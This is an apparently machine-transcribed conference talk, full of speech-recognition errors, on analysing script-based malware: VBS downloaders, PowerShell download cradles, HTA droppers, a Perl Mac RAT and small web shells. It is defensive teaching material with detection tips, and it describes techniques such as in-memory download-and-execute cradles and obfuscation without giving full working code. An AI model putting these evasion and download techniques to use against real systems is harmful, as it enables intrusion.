No Disassembly Required

all right so our next talk is no disassembly required Brian cetera with a readout okay I was like can you still hear me is that alright well we'll try this microphone and if it doesn't work I'll switch back to the other microphone okay if somebody can grab the doors so I am Brian cetera and this is no disassembly required which is a terrible pun and fully intended is the subject of this talk we'll be talking about script based malware but it's also going to be kind of an exhortation if you're not am our analyst to not be afraid to start doing malware analysis so I'll talk a little bit about some VBS malware talk about

some offensive PowerShell and some other some other types of script based malware the important parts upfront you can follow me on Twitter I've read out with a three I get home page I have an open source projects that I'm working on and we're starting up and running I over the past year done a lot of Mac OS related security stuff some free scripts up there for hardening Mac OS and some other materials related to that previous talks they've given and you can follow me on my blog at blog read out on IO again with a three which again currently is mostly some Mac security related stuff if anybody's interested in that and using an OS query for EDR some

tutorials up on that but the stuff from the training yesterday and from this talk will kind of be going up on there as a series of blogs hopefully soon so a little bit about me not really I usually kind of like the idea that you know talk should kind of stay on its own don't believe like the lab coat commercial philosophy right well I'm standing in a lab coat so by our product but just because people have asked me like yesterday at the training that we did you know how did you become of our analyst or how do I become a malware analyst or how did you get started in security brief in the background so I am

originally this furred got out of the military went back to school and GI Bill University of Pittsburgh had in information security program at their School of Information science like your graduate program went back to do that but really ended up getting into what I do now doing an internship with NC FTA which I know there's some people here today with NC FTA or hence the FTA alums as well you know where I got to work with federal law enforcement and see what they do and started just learning by doing right so way before your tax dollars paid for me to go to a $5,000 sans course with Lenny zeltser thank you uh-huh as a government our analyst I I

was just learning by doing as you know a guy working as an intern unpaid intern who was told go learn C go write a HelloWorld C program you know can pile it and throw the assembly and Ida Pro or Olli and see what it does right so and since then I've done kind of a InfoSec jack-of-all-trades it's like two of some background in intelligence like as an Intel analyst so it helps stand up some threatenings all programs and done a variety of other things too but you know I consider myself mainly a reverse engineer I see a reverse engineer instead of am our analyst in part because I've probably spent my work 5050 working on industrial

control systems and embedded stuff from a vulnerability analyst standpoint some more offensive ranted but also kind of a is a philosophical point and that I think it's more than just blog hunting or in the case of malware analysis throwing something in a sandbox and finding quote-unquote IOC s you know getting indicators that compromise its really understanding what does something really do not what the person who wrote the code thinks it does not what you originally at the outset thought it but what can it really do what does it really do how does it really work and that's kind of the essence of hacking right is discovering things can really do is this talk for you so by a show of

hands regardless of what your job title is you know how many people here have ever or on a relatively routine basis get asked to look at phishing emails okay how many people like get asked to do sort of EDR even if it's just your Joe helpdesk and hey go reimage this box right okay now out of all those people feel free to put your hands back up and put them down you know how many of you if this is not the case how many of you your company just says oh you want to go take a $6,000 sans course or you want ten grand to go fly out to Vegas to go to blackhat no problem any anybody anybody so so a

few people and I've been lucky enough that I've had companies both working on the government side and or certain companies that work for where I had the opportunity to do that usually because I controlled a budget and myself to go do that but but not everybody does right and and out of all the people who raised your hands how many of you your actual title is you're a malware analyst okay so not as many right so my point them trying to get across with this talk is just you know maybe you don't know where to start maybe your idea of malware analysis is well I'm not a malware analyst I don't have the right tools and/or the right environment I

don't have the training the certifications I just I can't really do anything other than just throw stuff in a sandbox and you know really all you need is the curiosity and persistence and the persistence is not to be underestimated right the unless you have the persistence almost to the point of masochism of I'm gonna do a really hard so doq puzzle or crossword puzzle and get to the end and realize I have to start over that's the type of persistence I'm talking about you know really just have to to to want to learn and I would say bottom line up front for anybody who suddenly has to go take a phone call or whatever you know like they always say

tell people we were gonna tell them and tell them and then tell them what you told them you know start with script-based our this is this was an epiphany that actually I kind of had but really all credit a friend of a friend of mine and former former coworker I had and we were talking to our analyst one of the better ones I've known had the Epiphany that you know 10 years ago or you know if we could tell somebody today like where should you start you know you have one day to train somebody that sort of thing that we would have you know before we did the whole learning sea and windows API and Windows

internals and spending a lot of time staring it assembly in Ida we would have started with script based malware or scripts right so it's just sort of the most bang for the buck the second point I would make is that it's it's it's not magic it's just code so even if you say I'm not a developer I've never written a line of code in my life write a HelloWorld script pictus pick a scripting language I guarantee you and if you already know something stick with that I guarantee you there's malware written in it I mean how many people here are Lua developers nobody right is can anyone here you know my show hands even even familiar with anything vaguely

important written in Lua it's like maybe a handful of people and out of any of those people is your answer not world of warcraft mods the other thing would be a bunch of Stuxnet and some some related stuff related implants there's been plenty of our written in Lua and it's pretty obscure language doesn't require any special software right it's literally all you need is a VM and notepad or some text editor and you can analyze script based malware it's not going to be the ideal environment maybe there are some other things that would help but you guys are going to see that's that's really about as basic as it gets and you know you smarter than a sandbox so if I had like

a single tagline for this talk that you are as a team or as a defender regardless of what you think you're capable of doing you are smarter than a sandbox and malware authors aren't stupid right they're putting in all sorts of anti forensics they might have fake call-outs they might have you know a weight that you don't know about and if all you ever did was detonate something in a sandbox and then go oh yeah I got the hyper tease you know we got this domain and that domain maybe you did maybe you didn't get the right payload you know maybe you didn't get the right situ you might not actually know that unless you've really looked at

the malware and done some manual analysis and that's not to say that automation doesn't have its place right for triage and things like that but it should be the first step and just that triage step right okay so enough on the soapbox I said that this was gonna be your best bang for the buck so this is kind of the Pareto principle anybody here familiar with the Pareto principle maybe a few people so this is alfredo Pareto he was an Italian economist clearly clear clearly a wise incredible man based on his beard it's actually an apocryphal attribution that I've only ever heard from people with MBAs or like from a business school background as somebody with an econ Amish degree once

upon a time you know it's it's not an actual economics thing and they think that it's like an apocryphal attribution by an engineer he did come up with Pareto optimality which is a real thing and like game theory but that's all other pull their talk my other nerd out area of expertise yeah so it's the idea is 20% of effort to get 80% of the return right so why not do that up front and start seeing an immediate ROI you know if I when I when I train interns or I've trained like new malware analysts this is always this is now like my standard approach because I can get them immediately doing useful work and feeling confident and feeling

like they know how to do something right rather than having somebody stumble around learning learning assembly so phishing email attachments drive-by downloads live off the land activity how many people have heard that buzzword right that's sort of like been the flavor of the month for a lot of months now so scripts what are they good for you know everybody here familiar with miter attack model or like Lockheed Martin cyber kill chain whatever model you want to use to kind of look at attacker behavior most of your stages or activities or something that an attacker can do with script based malware of some sort without portable executable files in many cases today may be doing without

compiled binaries just because that live off the land principle of using components that are going to be whitelisted things that are going to be kind of found tools that systems and ministers use and so on and so forth so let me start you start by getting into VB right into an example of this and that's the visual basic scripting and phishing emails so it would not be a malware talk without a little bit of the wayback machine talking about malware that nobody remembers maybe somebody some people in the room do you remember I love you were it was one of the first really big really big phishing email campaigns like mass mailer sort of thing

and it was just two students from the Philippines who wrote this in VBS and this is just a part of the code the main method or they may be you know the main function and sub in the script but it's estimated it affected something like forty five million users around the world unintentionally and this wasn't really a deliberate part of what the malware were supposed to do but it was just so successful that when it was going around looking in people's email outlet contacts and then remaining it copies of itself as an attachment as a phishing attachment it ended up crashing Outlook servers and and being like into a service attack on huge huge companies

and governments around the world and it was pretty malicious despite the claim so the two students that wrote it it looked for document and other specific file extensions and over wrote things so it's pretty disruptive the point is it was written in VBS and it was written in VBS with API API code that you know standard code that is still around in Windows 10 or some version of it it might be a new CLS IDE and a new you know a new version of something but it's like the same comm objects are still to be found on a Windows system today and so in terms of that mitre attack we're talking about you know initial access we're talking

about initial delivery and installation there's still stuff around today I've looked at phishing emails in the past year that we're not really that similar from something like I love you worm other than the fact that they were heavily obvious gated which which it did not have to be because there wasn't anybody looking to detect it so eighteen years later is still pointing strong which in a certain sense is kind of depressing in another sense though I think kind of makes the point that I was trying to make about the value of starting with scripts and learning something very simple can help solve you know a lot of problems or help give you a lot of capability so today primarily

you're gonna see this VB these types of VBS scripts used for staging payloads rather than as necessarily the main payload and what I mean by that for those who aren't familiar you know is either droppers or downloaders so a dropper we have might have an embedded executable not necessarily a VBS contacts but remember couple years ago it was a thing where people were using to compile dotnet files and the actual payload was just a variable that contained you know and encoded or encrypted string and they were just using it as a carrier file to get around defenses and specifically as an anti forensics against oxes downloaders right so it might just be a short snippet of

EBS using a handful of calm objects to go out and download the real payload and or it could the the real people could be scripts but so why would we do this this is making things a little bit more complicated than it needs to be well you know think about it this way would you rather write if you've got your new cool banking Trojan written in C or C++ or whatever and it took you six months to write or you paid for it from some guy in the Ukraine who it took him six months to write do you want that to get burned if you're a phishing email campaign go sideways or would you rather

just have a Java Script downloader that took you a half hour to write get burned and and I'd be the end of it and of course cybercrime you know is is a business and and there's not always vertical integration so I might be just delivering payload for a client and I want it to be sort of agnostic right and then to the defense evasion which I kind of already mentioned so in terms of tools I mean really you're just starting with a text editor and a VM now I would recommend using more of a full-featured text editor something like notepad plus plus that is intended for developers especially people who do scripting a lot and where you can kind of set it to a

particular scripting language and it'll highlight all the keywords that it recognizes as being associated with that scripting language but that's not necessary I mean you could just use notepad or something or G edit or whatever VI if you're really adventurous no VI event no VI them them fans okay that was a joke I would I would not I would smash my hand in a car door before I analyzed however but VI yeah so of course internet access we always want to be safe don't have your VM set to a bridge or an added connection ran into this yesterday with the training there were some folks who really didn't quite get the concept of hosts only

networks and we're asking questions about that so I'm not trying to oversimplify things but some people you know are not clear on that yeah I generally don't use real debuggers for most of the script power because it's so a lot of it is just simple downloaders and they're not real expensive I generally haven't found a super big need to use like a full-featured debugger but if you did want to like if you install Microsoft Visual Studio there is and there is with CS C script Exe E and like W script there's an option like a forward slash ax that you can start Ronna VBS script in like a debugger a real debugger mode and I think set set

set points and things like that I don't do that my poor man's debugger is just using message box so in VBS if you just you'll see it in a minute but if you just put things in a message box you can get an immediate feed out our output and feedback of what the code was doing similar thing if you're working with malicious JavaScript or just using like an alert box right general strategy for these VBS downloader phishing emails you've got to first extract it from source and sometimes this is the hardest part and that's a whole talk onto itself it's a whole talk for another day but and I'll go through an exam I'll go through some

of it and my example that we have coming up here in a minute but you know it's generally gonna involve extracting like an O le object from interact extracting something from a word document and carving it out and then getting it into your text editor finding unobvious gated code keywords and cleaning up line written generally cleaning up the code so in fee BS you'll have the whole script will be shoved together with colons which which act is like a line continuation and so breaking those out just so it's more readable and then as I said if you're using something like notepad plus plus anything that's uh Navia skated which there's always going to be some code that they've left

unobvious gated it's going to go ahead highlight that for you and that gives you like a better fun better starting point right of determining hey this is a worse of function starts and stops or something like that even if I can't read what it does sometimes iOS user just in plain text as you'll see a little bit later but as I said don't believe it because you don't know what took me it's high forensics are going on try finding eval or execute functions and substituting them with message box that's like the go-to first Jose maybe 25% something less than 50% with a sizeable chunk of VBS malware you can defeat the obvious case in just with

that right because it's they're being lazy they just want to avoid basic detection and they're just running everything through eval and you can do the same thing too and just output with message box the unobvious gated copy of the code get rid of obvious garbage functions you know look for the DD the decoder or D obvious keishon functions because they have to be in the sample somewhere maybe possibly if this was like a second stage to some other malware there might be some other component that does the decoding and decrypting but generally you're gonna have some type of decoder function like that the simplest method being that eval statement that's gonna be in the malware

itself so if you can find that first you can write it a quick decoder and whatever scripting language you're comfortable with doesn't have to be the same scripting language I mean I've had people ask me that just because I'm looking at VBS doesn't mean that I can't use Python to write my decoder and especially if I'm seeing the same type of thing over and over again and the same type of phishing emails over and over again you might start to have a payoff to writing those decoders and and making them a little more robust identify the really useful bits it's typically gonna be common really common or run-of-the-mill common seem calm objects over and over again you'll see

and we'll see all this coming up in the example renaming functions to something meaningful and commenting your code this is even more in our analysis than it is and I think in being a developer because ultimately you have to communicate your results and your information to someone else for your work to be a value whether that's reporting to management whether that's talking to thread Intel guys who aren't as technical as you are or whether that's communicating information so you can write a yarder rule or a signature for an IDs or something so you want to right off the bat start commenting your code as you go and renaming things in a way that's gonna help help that and I

think them like the miter attack model or something along those lines is a good way to standardize your language in terminology when you do that establishing sequence of files and processes noting anti forensics the last the only thing I'll hit on here is this last point it's a little bit of a soapbox point but that observables are not indicators so you know I once got an Excel spreadsheet from an analyst at a fortune 500 sock that was more or less just a big list of ip's and I was kind of like it was like did you get those indicators yeah so are these IP addresses you know hosting second-stage payloads is this a c2 server what is

this right it's that contacts that makes an indicator and indicator and actionable and so again when you're you're you know making your notes and you're saying I'm trying to find IFC's make sure you're finding actual IOC s and have all the information sorry soapbox point so let's go through an example I think this is going to be a little bit more clear VBS downloader so phishing email was received forwarded to security to an organization there was an embedded it was embedded in a word document the word document was password protected so going back to answer forensics we had a cuckoo beast like sandbox farm setup that we could throw samples through and we were actually

more using that for kind of threat emulation and helping develop blue team tactics then like operationally focused malware analysis but the point is is that that that kind of broke that model right and broke the idea of just detonating it in cuckoo even though we had cuckoo sandbox is set up with with were office in them and we typically could just detonate office documents and get get information so how to use used ms ms ms em sock which is a ms o le or excuse me an MS password removal tool third a number of them out there this is just a free one that I think has a github page and then carved out the the script in from word

and he had just in this case it was easy enough to do it once it was decrypted or decompressed the password correction was removed to do it it was a hex editor but you know you may do that with some other tools like Baldwin's ma office mal scanner or the de collage I forget the actual name of the tool but the site is de collage that have the Oh le extractor tool that they have there you can google for them this is a little you know and then it was just a matter of starting the base and cleanup so as I said to kind of focus on the actual script part is that first part is sort of its own

art form as well on the right here you can see that is the obvious gated copy where I've just done an initial cleanup of breaking out those line continuations so that it's a little bit more readable and you can see that notepad plus plus has identified functions and so I'm able to say okay this is a function here's the name of the function it's not a human readable name it's sort of a garbage name but I can highlight that and then search to see is this function even called anywhere else in the script and if not it's probably just garbage code there to distract me and I can delete it out at least out of a copy of

the script and start working from that assumption and I'm gradually reducing this stuff I actually have to look at right so after I've eliminated some of the garbage code I'm going through t obvious Gatien so I've identified this function which you can see up there which is actually three functions that were the main obvious Gatien functions or I should say D obvious Kishin functions to undo what they had done in the in the in the script the top one was just a modulus function that they implemented themselves for some reason probably just to avoid having that VBS keyword in the file plain text I don't really know but that's what they did and they just did some math operations on

strings that they had converted from a character to the number value of the character and so they were doing math operations on them an XOR fun that they did that they were using well we'll see what it was used for in a second and then the main decode function that was used for the main obvious keishon of like the body of the code and so then from there I was able to take that main D obvious Gatien function and write a quick decoder and start clearing up the useful code that actually did something and it wasn't junk code and as I said I came up with some fairly common comm objects so in this case they're creating

an XML HTTP object so typically you're gonna see either that or you're gonna see an Internet Explorer object being created sort of as a headless browser to go out and pull down some other content that's a pretty good indication or potentially to push information up to a c2 server it's more often has in this case a downloader and yeah I don't know if you can see this but in the open statement they're using a get request method and then that queue v70 I probably should have renamed for this just for this screenshot for everybody but that was the URL so I was then able to find they had a function that was essentially doing a URL chooser it

wasn't exactly like a domain generation algorithm it was just choosing from a list of hard-coded URLs to use and there were some anti forensics measures beyond that like we times and things like that so if I just thrown the into a sandbox and rolled with the first thing I got or had been running like fake net and G or something I might have gotten a domain name that wasn't even being used actively by the attacker I may have gotten one that was no longer being used or whatever the case may be I would not have gotten all of the URLs all of those out of the file and then the XOR function was actually discovered

was not being used and you can see this at the bottom there is a selection that can ISM for what byte key to use and just you know level set here for everybody you know if you're not familiar I mean XOR is one of the more common methods of obvious Gatien simple obvious Gatien that people use it's pretty convenient because as I said whatever you do you have to undo so if I have converted things to a number and then I X or if I X or a byte stream right by some bike key and then I XOR it again by the same bike key I get back anybody the same thing I started with

right it's kind of convenient that way so this was just their method of decoding the payload that they were going out and getting so in order to decode this payloads when I would go out and curl the second stage or you some some manner to go out and get the second stage and if you're gonna do that curl kind of keying on the red team talk that just happened you know it know to people that if you use you know you can use tools like curl and set up your own profile so that you're not just using the default header like that's basic practice you should be creating a spoofed spoofed header with a spoofed

user agent and all that stuff so that you don't look like and a blue team er going out and getting a sec payload you look like a dick yeah so then I was able to decode the second-stage payload so lessons learned dynamic analysis wouldn't miss stuff you need those XOR keys who's able to recover those and it's just reuse of basic comm objects' like a handful of common objects is this you can see the file system object in the second part and you know typically some type of W script shell object because you can use those to do a headless command line and run files run files with an argument to it that sort of thing

edit registry keys so on and so forth so if you learn in like JavaScript let's say or VBS you learn the example cut you look at SS 64 calm or MSDN and you look at api's and you look at how to use a basic set of maybe four or five different comma objects the ones I just named being most of them you can you can a do be stream objects with the other you can you can pretty much understand and identify the important parts of the vast majority of like VBS or JavaScript download or phishing email code that you're gonna look at so you don't have to be a hundred percent proficient expert in VBS you just have to be able

to recognize those important parts and kind of understand how they work this was just some stuff that I think I've already kind of covered about string string manipulations and character manipulations with the ASC key you would see the opposite of it the undoing of it is going to be done with the reversing of that it's gonna be done with a CHR like with a kid that character function to get it back to a character that's that's an example this dim foo they're just storing in that variable the whole script is a big long string and then running it through execute and so this is one of those cases where as I said if I just substitute execute with message

box I get the DD obvious gated script so rolling rolling right along PowerShell scripting try and knock through this sure everybody here is familiar with our shell anybody not familiar with PowerShell right no ok good so you know basic idea was more or Bosch like experience more powerful for systems administration features like command command dot exe above blue 2012 was sort of the year of PowerShell I mean PowerShell came out in 2006 but the offensive PowerShell use really kicked off in high gear 2012 with all these big talks at blackhat and der beek on DEFCON all the conferences yet Dave Kennedy and Josh Kelly I think there's actually another Ian his name I misspelled it doing their talk that oMFG

talk at blackhat Matt graver you had tools coming out like power sploit followed by you know Empire and the Shang and so on and so forth and a team really has sort of led the way on this this philosophy and this live off the land methodology but the advanced persistent threat actors and you know various actual malicious actors have adopted the same techniques because they work because there are all of these legitimate InfoSec professionals doing all the development work for them and this this chart on the right was just to show that again with PowerShell we can do pretty much all the stuff that we need to do especially in that middle box which is this sort of actions on

objectives in this ekc terminology this is where the offensive PowerShell really shines right and that lateral movement privilege escalation so on and so forth and so I mean how many people here have not heard that you might live off the land or fireless intrusions usually in the sales pitch if some vendor who claims they can detect it and defend it and defeat it and make you cappuccino live off the land oh really how I sort of interpret it is using white list of applications tool scripting engines stuff that your admins use so that it doesn't look unusual you're making a smaller footprint you're making a smaller footprint for EDR Geoff fewer artifacts in the endpoint you're not

writing as much stuff to file and you also have fewer artifacts you're downloading that are gonna be in network traffic file ish file this intrusion I think to the extent that it has a meaning beyond a buzz word or eles pitch is you know just this idea that we're writing fewer artifacts to disk and PowerShell is sort of uniquely capable of that because of the remote management features that has so I can run a PowerShell script on my system or on a system that I'm using as a pivot point and run it on a remote host and it's not gonna get rid own to write the file to disk on that system it's gonna be in

memory and maybe if they have a script block logging enabled they're gonna catch it in script lock logs and like a Windows Event 4104 which I'll get to in a second here and so these are some of the basic methods that you commonly see again one of the advantages is with like the invoke command you can run this not just against one target you can run it against multiple target hosts the term cradles so I'm sure people here have heard maybe the term like PowerShell cradles and wondered exactly what that means other than jargon and buzzwords this came out of like raffia lodges talk and 2015 the flying a Cylon Raider which you can read the PDF version from sands

of that this is a great example you're commonly gonna see right is this invoke expression which that's aliased and then creating a dotnet web client I kind of had in my previous slide you've got access to everything dotnet natively so and commonly used we're going to use the download string method instead of a download file method just because it allows me to do that running of a remote grab that remotely hosted powershell script and run it without writing it to disk first on the local system and of course other tools were adopted to take advantage of that so the invoke mimic ats version of running mimic adds one of the cost of putting putting this in context where

you may see stuff like this getting used if you're looking at phishing emails since a lot of people said that they looked at phishing emails would be and each a files anybody here run into like malicious HTA phishing emails I see a few heads nodding and some people putting hands in the air yeah so in 2017 there was a CVE 2017 199 which really wasn't it wasn't a bug or anything it was just Microsoft function how it either could be abused which is always the best part and that's why I said in the beginning of my talk reverse engineering is more than just finding a bug right sometimes it's a feature and this allowed HTA

files to just be opened in a Word file and was billed as like macro less macro less exploitative Word documents with EGA this has since been closed down that that loophole has sort of been closed down by Microsoft but there's still other methods to execute HTA's it's still used by attackers one thing is it's a defensive defensive asian measure because you're using a white listed legitimate application MSHDA dot exe to launch some other malicious content to look for this by the way in Windows event logs 46:56 queries to HTA related CLS IDs and your forty six eighty eight process creation from SH ta would be one way to start this this is an actual malicious ht8 downloader that courtesy

Nick Carr from daily daily scriptlet guy if anybody follows him I would recommend it that he got emailed from somebody else another malware researcher and it's just kind of humorous because this is how not to obvious Khaitan HT a file or any other malware so you can see some of the similar stuff you saw in the earlier VBS script but they've left they've heavily obviously did it they're using PowerShell and sort of the middle part for the downloader there's PowerShell cradle and then they've decided to for some reason not obvious Kate the IOC s like the stuff that we would really be looking for right and you would still want to go ahead and you

obviously this just to make sure that this isn't messing with you and some sort of anti forensics but this gives you a good look at what the functionality would be so I've got my HTML and then enclosed within my HTML I've got a VB script and the vbscript is really being used to do the filing handling of writing and running the file which they're temporarily storing into an environmental variable and then pulling it back out again and the actual downloading is being done with with the download file method of that dotnet web client object why they chose to do this instead of doing a one-liner with the download string I'm not 100% certain but that's what they did so again it's not

too different from what you saw in the earlier VBS file but they're using PowerShell for that download or cradle we could sit here and talk for an hour just about or more her weeks well I couldn't because I don't know a week worth of material but there are people who do like Daniel Bohannon hunt powershell obvious gation it's a lot of the same games you know there's aliased expressions or aliased commandlets base64 encoding as you can see on the right using tick marks concatenations your dash F format feature is a really common string manipulation you see with the powershell and at the end of the day there's - there's too many to cover over here the end of the day the big point I

would make is just that it led to this PowerShell arms race and you had the top some really top researchers like Daniel Bohannon from a Myint and the ALMS with Microsoft and Microsoft Azure who was one of the people who who originally wrote PowerShell script in PowerShell getting into this this cat and mouse game with who could create even more complicated obvious caissons and Microsoft introducing security features with each version of PowerShell so that's really behooves you to use five five one or if you're getting into using Linux systems as well version six engine because it built in just enough administration script lock logging and so forth and on the left you can see that script lock being caught

with a 401 for when it is event log which you would not catch if people were running their PowerShell your administrators or using like v2 of PowerShell or the attacker has successfully downgraded to v2 and so that becomes another thing to look for as you're looking for the downgrade instead of instead of the malicious activity itself at least as a starting point and then of course you have the end of the PowerShell arms race cold war with damn Bohannon and Lee homes coming together in 2017 and doing like the revoke obvious Gatien and revoke obvious ocation talks and that's a really useful tool that I would recommend and basically their point that they arrived at was that it's so hard to

manually do view skate some of the stuff you can create in terms of PowerShell obvious keishon that you almost need to adopt more of the logs and statistical analysis based approach and that's a part of what their tool does is it facilitates that and reassembling scripts that span multiple logs other malware really quick since we are are ticking down the clock I thought I mentioned this one Mac OS malware so this just shows you the scope of what you can do just looking at script malware so last year 2017 one of the big big news items in Mac OS malware if people follow that stuff Patrick Wordle I would also recommend like Chris Chris Ross from Spectre ops is a good guy on

that stuff was this fruit fly malware as they called it and you had all these InfoSec blogs and researchers who rushed out this is clearly some never-before-seen really stealthy apt actor who was targeting very specifically the biotech sector and in these complicated theories based on what was found on this professors laptop and this university and so on and so forth and of course as it turns out it was really just this disgruntled software engineer from Cleveland and named filthy Phil juror chin ski and he has not been convicted but he has been charged with 16 counts of everything you can do naughty with a computer and he was probably a Browns fan so is this really

surprising ah you know so the point is is that he infected systems like at police departments and on US government systems and had persistence for years on some of the systems as far as anybody could tell why he was using one of the most low-hanging fruit no pun intended persistence mechanisms you can use on Mac OS which is just a P less item in the uhland long n launch D um but nobody was looking for him and nobody really knew how to look for him and nobody was analyzing his Mauer and it was just Perl script so he was able to create a completely workable rat entirely in Perl script so there you go and in really old

libraries of Perl script that was that was what people's interest they thought it was some sort of anti forensic stealth measure or something that he was using out of date code malicious JavaScript that again that's a whole week worth of material I would refer you to a wasp I think there was like kind of a new hospital this morning but you know JavaScript was intended to be able to do client-side dynamic content for web content and so you can just as easily dynamically create bad stuff right and tiny web shells same thing last ditch effort backdoor doing government work I've seen this a lot with apt actors targeting government organizations that is their backdoor of last resort after

they've been kicked off a network is leaving behind you know it could be as small with like China chopper is a 4k file with just a simple PHP PHP code in it to receive commands and run commands on the web server and it's just a toehold it's just you know propping open the back door while you ransack the house just in case right so my final caveat I'll leave you with so I would say that it is the 20% that gets you the 80% looking at Script malware and I would encourage everybody to start there but if you're going to be a full time our analyst if you want to go work in a shop where all you do is

sit and go through a queue of malware sample after our sample you probably do want to get your gram if you can you want to learn see learn C++ and assembly maybe even our arm as opposed to just x86 64 you're gonna start looking at like Android malware or something and start to recognize control flow so write your own hello world file compile it in different compilers and then look at the difference in the assembly when you open it up in ida pro or a ladybug and you'll see the differences that are just artifacts and pilers right what is the calling convention who call you know who cleans up the stack is it the calling

function or is it the colleague that's gonna vary from compiler to compiler that's ocean Lotus rat it's a Mac OS mock Oh binary in Ida just a random gratuitous this is some water shot you have to have one of those in the malware talker it's not a malware talk learn file formats like I said you learn to use disassemblers and debuggers but start with scripts and for most of us who your job title is not an hour analyst but you're you are a maori analysts you're being asked to do it you're being asked to look at malicious phishing emails take take a look at a time and if you you know if you're able to remove the time and and just start

scripting start writing scripts and looking at your own scripts start with those basic calm calm functions or comma objects so they talked about like the ones that create web objects XML HTTP and how to do that or the Internet Explorer object and so again it's not magic it's just code all you really need is a VM in a text editor and some persistence and you are smarter than a sandbox so you can do it and I wish it was as easy I love Dilbert but I wish it was as easy as you know just getting a software engineer to write an app for that but there's no magic bullet it's just persistence of doing it that's

that's how you become the Mauer analyst special thanks yeah like I said just a shout out to Adam swan and you can follow those guys and Nate with Jennie follow them on Twitter they're big elk stack blue team er guys and analysts who do cool stuff well and help contribute to this talk and these are some of the blogs that I follow or Twitter feeds and I follow of people who are relevant to what I just talked about and who do a lot of good work on what I just talked about and I'll put the slides up at some point like as a PDF on my github page which we kind of saw it beginning and I just

weird out with a three and if you need to find me the easiest way to google for it is applesauce in the bucket that's my Apple security repository and it seems to be the one that pops up in Google any questions we have just a minute or something left questions yes [Music]

yeah so yeah so so to speak to that point really quickly two things okay number one yeah there are sites you can go out to websites that will obvious skate or div escape stuff for you automatically they don't always work and more importantly if you're doing this for reals for stuff from your company and this is stuff you've gotten it's just a matter of basic OPSEC that you don't want to go out and just don't paste that into an online tool and you don't know whoever's running that site or why they're running it and what they're doing it's kind of like just saying well I can just take the samples and upload them all to virustotal

right it's an object thing it depends on why you're doing the analysis and and so on and so forth and in terms of getting your hands dirty I mean so the people who did the training yesterday we did a whole training I had them start out by writing scripts rather than trying to div escape real samples and that would be my recommendation right so if you're not you just said if you're not a coder okay I would start out by not trying to div escape obvious gated samples that some malware author is written I would start out by writing my own really simple downloader with two VMs and having an Apache server with a text file on it and

writing my own VBS or JavaScript downloader that downloads a file and understanding that functionality and then when you start to look at obvious gated stuff you'll recognize even though it's quote/unquote obvious gated you're gonna recognize the basic structure of what's going on does that help answer your question yeah sure so that would be the right way to do it if you're using an automated tool would be to make sure you had a local copy yep like I said that may not always work though right any other questions okay thank you [Applause]